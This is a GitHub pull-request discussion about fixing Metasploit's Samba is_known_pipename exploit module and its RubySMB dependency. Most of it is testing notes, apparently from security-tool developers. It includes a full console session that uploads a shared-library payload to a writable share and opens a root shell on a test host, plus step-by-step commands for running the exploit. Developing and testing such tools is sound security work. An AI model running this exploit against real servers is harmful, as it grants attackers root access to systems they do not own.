Fix is_known_pipename module #14035
Conversation
I'm going to mark this |
That's correct! Thanks for the review! I'll let you know when the new |
@smcintyre-r7 , a new |
Well I tested this and I couldn't get the module to work without commenting out these lines in RubySMB. With the RubySMB exception
Without the RubySMB exception
I think the root cause is this check in |
Thanks for testing this @smcintyre-r7! I tracked down the issue and it is related to a bug in SMB1 Trans2 response packet structures. This has been fixed in rapid7/ruby_smb#165. RubySMB tries to parse the response packet as an
I'm going to mark this PR as delayed again until rapid7/ruby_smb#165 has been landed. |
With the latest RubySMB (2.0.6) changes this is now working as intended:
msf6 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
msf6 exploit(linux/samba/is_known_pipename) > set RHOSTS 192.168.159.51
RHOSTS => 192.168.159.51
msf6 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER test
SMB_FOLDER => test
msf6 exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME NetApps
SMB_SHARE_NAME => NetApps
msf6 exploit(linux/samba/is_known_pipename) > exploit
[*] 192.168.159.51:445 - Using location \\192.168.159.51\NetApps\test for the path
[*] 192.168.159.51:445 - Retrieving the remote path of the share 'NetApps'
[*] 192.168.159.51:445 - Share 'NetApps' has server-side path '/data/network-applications
[*] 192.168.159.51:445 - Uploaded payload to \\192.168.159.51\NetApps\test\uXMZXHua.so
[*] 192.168.159.51:445 - Loading the payload from server-side path /data/network-applications/test/uXMZXHua.so using \\PIPE\/data/network-applications/test/uXMZXHua.so...
[+] 192.168.159.51:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.159.51:445) at 2020-09-23 17:44:03 -0400
id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 1? [y/N] y
[*] 192.168.159.51 - Command shell session 1 closed. Reason: User exit
msf6 exploit(linux/samba/is_known_pipename) >
I've removed the delayed tag, then I'll bump the RubySMB version in the Gemfile as I land this. Thanks @cdelafuente-r7 !
Release Notes
Fixed an issue in the |
This fixes part of #13976.
This requires these fixes in the RubySMB library, which are not merged yet: rapid7/ruby_smb#163
To test this PR, RubySMB will need to be used from source until this PR is merged and a new gem is released:
- Do: git clone https://github.com/cdelafuente-r7/ruby_smb
- Do: cd path/to/ruby_smb
- Do: git checkout fix_for_old_samba_compatibility
- Add this to your Gemfile: gem 'ruby_smb', :path => 'path/to/ruby_smb'
- Do: bundle install
UPDATE: The PR has been merged and a new ruby_gem has been released. I updated the Gemfile.lock to reflect this. This has been tested against Samba 3.5.4, 3.6.6 and 4.1.11.
Verification
msfconsole
use linux/samba/is_known_pipename
set RHOSTS <host>
set SMBUSER <username>
set SMBPASS <password>
exploit